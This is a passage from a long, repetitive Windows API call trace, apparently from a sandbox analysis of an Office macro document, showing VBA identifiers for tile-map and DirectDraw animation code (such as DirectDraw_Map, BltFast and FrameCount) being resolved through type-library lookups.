pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.511] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.511] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb494df0 [0045.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MapY") returned 0x1092fe [0045.511] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xc, _Src="_B_var_MapY" | out: _Dst="_B_var_MapY") returned 0x0 [0045.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=12, lpWideCharStr=0x2e4540, cchWideChar=12 | out: lpWideCharStr="_B_var_MapY") returned 12 [0045.511] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.511] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_MapY", lHashVal=0x1092fe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.511] IUnknown:Release (This=0x782a220) returned 0x22 [0045.511] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.511] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_MapY", lHashVal=0x1092fe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.511] IUnknown:Release (This=0x731da90) returned 0x15 [0045.511] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.511] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_MapY", lHashVal=0x1092fe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.511] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.511] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.511] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_MapY", lHashVal=0x1092fe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.511] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.511] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.511] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_MapY", lHashVal=0x1092fe, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.511] IUnknown:Release (This=0x782b300) returned 0x6 [0045.511] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.511] IUnknown:Release (This=0x782a220) returned 0x22 [0045.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c72, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="rs") returned 0 [0045.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c72, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="rs") returned 0 [0045.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.511] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb494df0 [0045.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResX") returned 0x108529 [0045.511] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.511] IUnknown:Release (This=0x782a220) returned 0x22 [0045.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResY") returned 0x108526 [0045.511] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.511] IUnknown:Release (This=0x782a220) returned 0x22 [0045.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TileG") returned 0x105329 [0045.512] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x6, _Src="TileG" | out: _Dst="TileG") returned 0x0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=6, lpWideCharStr=0x2e4390, cchWideChar=6 | out: lpWideCharStr="TileG") returned 6 [0045.512] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.512] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="TileG", lHashVal=0x105329, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.512] IUnknown:Release (This=0x782a220) returned 0x22 [0045.512] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.512] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="TileG", lHashVal=0x105329, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.512] IUnknown:Release (This=0x731da90) returned 0x15 [0045.512] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.512] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="TileG", lHashVal=0x105329, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.512] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.512] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.512] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="TileG", lHashVal=0x105329, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.512] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.512] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_TileG") returned 0x101716 [0045.512] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xd, _Src="_B_var_TileG" | out: _Dst="_B_var_TileG") returned 0x0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=13, lpWideCharStr=0x2e4540, cchWideChar=13 | out: lpWideCharStr="_B_var_TileG") returned 13 [0045.512] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.512] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_TileG", lHashVal=0x101716, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.512] IUnknown:Release (This=0x782a220) returned 0x22 [0045.512] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.512] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_TileG", lHashVal=0x101716, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.512] IUnknown:Release (This=0x731da90) returned 0x15 [0045.512] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.512] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_TileG", lHashVal=0x101716, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.512] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.512] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.512] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_TileG", lHashVal=0x101716, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.512] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.512] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.512] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_TileG", lHashVal=0x101716, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.512] IUnknown:Release (This=0x782b300) returned 0x6 [0045.512] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.512] IUnknown:Release (This=0x782a220) returned 0x22 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.512] wcscpy_s (in: _Destination=0xb64be68, _SizeInWords=0x3, _Source="et" | out: _Destination="et") returned 0x0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4400, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68210ee, cbMultiByte=6, lpWideCharStr=0x2e4400, cchWideChar=5 | out: lpWideCharStr="Left") returned 0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5093e, cbMultiByte=5, lpWideCharStr=0x2e4400, cchWideChar=4 | out: lpWideCharStr="Top") returned 0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822f6a, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="Right") returned 0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52db6, cbMultiByte=4, lpWideCharStr=0x2e4400, cchWideChar=3 | out: lpWideCharStr="et") returned 0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5098e, cbMultiByte=8, lpWideCharStr=0x2e4400, cchWideChar=7 | out: lpWideCharStr="Bottom") returned 0 [0045.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_Map") returned 0x10cd0c [0045.513] strcpy_s (in: _Dst=0x2e4540, _DstSize=0xf, _Src="DirectDraw_Map" | out: _Dst="DirectDraw_Map") returned 0x0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=15, lpWideCharStr=0x2e4390, cchWideChar=15 | out: lpWideCharStr="DirectDraw_Map") returned 15 [0045.513] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.513] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="DirectDraw_Map", lHashVal=0x10cd0c, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.513] IUnknown:Release (This=0x782a220) returned 0x22 [0045.513] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.513] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="DirectDraw_Map", lHashVal=0x10cd0c, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.513] IUnknown:Release (This=0x731da90) returned 0x15 [0045.513] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.513] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="DirectDraw_Map", lHashVal=0x10cd0c, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.513] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.513] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.513] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="DirectDraw_Map", lHashVal=0x10cd0c, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.513] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.513] IMalloc:Alloc (This=0x7fefe015380, cb=0x16) returned 0xb494df0 [0045.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DirectDraw_Map") returned 0x10645c [0045.513] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0x16, _Src="_B_var_DirectDraw_Map" | out: _Dst="_B_var_DirectDraw_Map") returned 0x0 [0045.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=22, lpWideCharStr=0x2e4540, cchWideChar=22 | out: lpWideCharStr="_B_var_DirectDraw_Map") returned 22 [0045.513] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.513] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_DirectDraw_Map", lHashVal=0x10645c, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.513] IUnknown:Release (This=0x782a220) returned 0x22 [0045.513] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.513] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_DirectDraw_Map", lHashVal=0x10645c, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.513] IUnknown:Release (This=0x731da90) returned 0x15 [0045.513] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.513] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_DirectDraw_Map", lHashVal=0x10645c, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.513] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.513] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.513] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_DirectDraw_Map", lHashVal=0x10645c, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.513] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.513] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.513] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_DirectDraw_Map", lHashVal=0x10645c, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.513] IUnknown:Release (This=0x782b300) returned 0x6 [0045.513] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.513] IUnknown:Release (This=0x782a220) returned 0x22 [0045.514] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DDBLTFAST_WAIT") returned 0x1027f3 [0045.514] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.514] IUnknown:Release (This=0x782a220) returned 0x22 [0045.514] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DDBLTFAST_SRCCOLORKEY") returned 0x108f81 [0045.514] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.514] IUnknown:Release (This=0x782a220) returned 0x22 [0045.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a520ce, cbMultiByte=9, lpWideCharStr=0x2e4400, cchWideChar=8 | out: lpWideCharStr="BltFast") returned 0 [0045.514] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimO") returned 0x104c61 [0045.514] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x6, _Src="AnimO" | out: _Dst="AnimO") returned 0x0 [0045.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=6, lpWideCharStr=0x2e4390, cchWideChar=6 | out: lpWideCharStr="AnimO") returned 6 [0045.514] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.514] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="AnimO", lHashVal=0x104c61, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.514] IUnknown:Release (This=0x782a220) returned 0x22 [0045.514] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.514] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="AnimO", lHashVal=0x104c61, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.514] IUnknown:Release (This=0x731da90) returned 0x15 [0045.514] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.514] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="AnimO", lHashVal=0x104c61, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.514] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.514] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.514] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="AnimO", lHashVal=0x104c61, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.514] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.514] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb494df0 [0045.514] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AnimO") returned 0x10104e [0045.514] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xd, _Src="_B_var_AnimO" | out: _Dst="_B_var_AnimO") returned 0x0 [0045.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=13, lpWideCharStr=0x2e4540, cchWideChar=13 | out: lpWideCharStr="_B_var_AnimO") returned 13 [0045.514] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.514] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_AnimO", lHashVal=0x10104e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.514] IUnknown:Release (This=0x782a220) returned 0x22 [0045.514] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.514] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_AnimO", lHashVal=0x10104e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.514] IUnknown:Release (This=0x731da90) returned 0x15 [0045.514] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.514] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_AnimO", lHashVal=0x10104e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.514] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.514] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.514] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_AnimO", lHashVal=0x10104e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.514] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.514] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.514] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_AnimO", lHashVal=0x10104e, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.515] IUnknown:Release (This=0x782b300) returned 0x6 [0045.515] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.515] IUnknown:Release (This=0x782a220) returned 0x22 [0045.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52e62, cbMultiByte=7, lpWideCharStr=0x2e4400, cchWideChar=6 | out: lpWideCharStr="ffset") returned 0 [0045.515] wcscpy_s (in: _Destination=0xb64be78, _SizeInWords=0x6, _Source="ffset" | out: _Destination="ffset") returned 0x0 [0045.515] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Animati") returned 0x1080e9 [0045.515] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x8, _Src="Animati" | out: _Dst="Animati") returned 0x0 [0045.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=8, lpWideCharStr=0x2e4390, cchWideChar=8 | out: lpWideCharStr="Animati") returned 8 [0045.515] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.515] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Animati", lHashVal=0x1080e9, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.515] IUnknown:Release (This=0x782a220) returned 0x22 [0045.515] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.515] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Animati", lHashVal=0x1080e9, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.515] IUnknown:Release (This=0x731da90) returned 0x15 [0045.515] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.515] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Animati", lHashVal=0x1080e9, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.515] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.515] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.515] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Animati", lHashVal=0x1080e9, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.515] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.515] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0xb494df0 [0045.515] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Animati") returned 0x10846d [0045.515] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xf, _Src="_B_var_Animati" | out: _Dst="_B_var_Animati") returned 0x0 [0045.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=15, lpWideCharStr=0x2e4540, cchWideChar=15 | out: lpWideCharStr="_B_var_Animati") returned 15 [0045.515] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.515] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Animati", lHashVal=0x10846d, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.515] IUnknown:Release (This=0x782a220) returned 0x22 [0045.515] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.515] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Animati", lHashVal=0x10846d, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.515] IUnknown:Release (This=0x731da90) returned 0x15 [0045.515] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.515] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Animati", lHashVal=0x10846d, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.515] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.515] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.515] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Animati", lHashVal=0x10846d, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.515] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.515] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.515] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Animati", lHashVal=0x10846d, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.515] IUnknown:Release (This=0x782b300) returned 0x6 [0045.515] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.515] IUnknown:Release (This=0x782a220) returned 0x22 [0045.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52eb2, cbMultiByte=5, lpWideCharStr=0x2e4400, cchWideChar=4 | out: lpWideCharStr="ons") returned 0 [0045.516] wcscpy_s (in: _Destination=0xb64be90, _SizeInWords=0x4, _Source="ons" | out: _Destination="ons") returned 0x0 [0045.516] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FrameC") returned 0x10b928 [0045.516] strcpy_s (in: _Dst=0x2e4540, _DstSize=0x7, _Src="FrameC" | out: _Dst="FrameC") returned 0x0 [0045.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4540, cbMultiByte=7, lpWideCharStr=0x2e4390, cchWideChar=7 | out: lpWideCharStr="FrameC") returned 7 [0045.516] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.516] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="FrameC", lHashVal=0x10b928, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.516] IUnknown:Release (This=0x782a220) returned 0x22 [0045.516] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.516] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="FrameC", lHashVal=0x10b928, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.516] IUnknown:Release (This=0x731da90) returned 0x15 [0045.516] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.516] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="FrameC", lHashVal=0x10b928, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.516] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.516] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.516] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="FrameC", lHashVal=0x10b928, pfName=0x2e4460, pBstrLibName=0x2e4390 | out: pfName=0x2e4460*=0, pBstrLibName=0x2e4390) returned 0x0 [0045.516] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.516] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb494df0 [0045.516] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FrameC") returned 0x103392 [0045.516] strcpy_s (in: _Dst=0x2e46f0, _DstSize=0xe, _Src="_B_var_FrameC" | out: _Dst="_B_var_FrameC") returned 0x0 [0045.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46f0, cbMultiByte=14, lpWideCharStr=0x2e4540, cchWideChar=14 | out: lpWideCharStr="_B_var_FrameC") returned 14 [0045.516] IUnknown:AddRef (This=0x782a220) returned 0x23 [0045.516] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_FrameC", lHashVal=0x103392, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.516] IUnknown:Release (This=0x782a220) returned 0x22 [0045.516] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.516] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_FrameC", lHashVal=0x103392, pfName=0x2e4610, pBstrLibName=0x2e4540 | out: pfName=0x2e4610*=0, pBstrLibName=0x2e4540) returned 0x0 [0045.516] IUnknown:Release (This=0x731da90) returned 0x15 [0045.516] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.516] 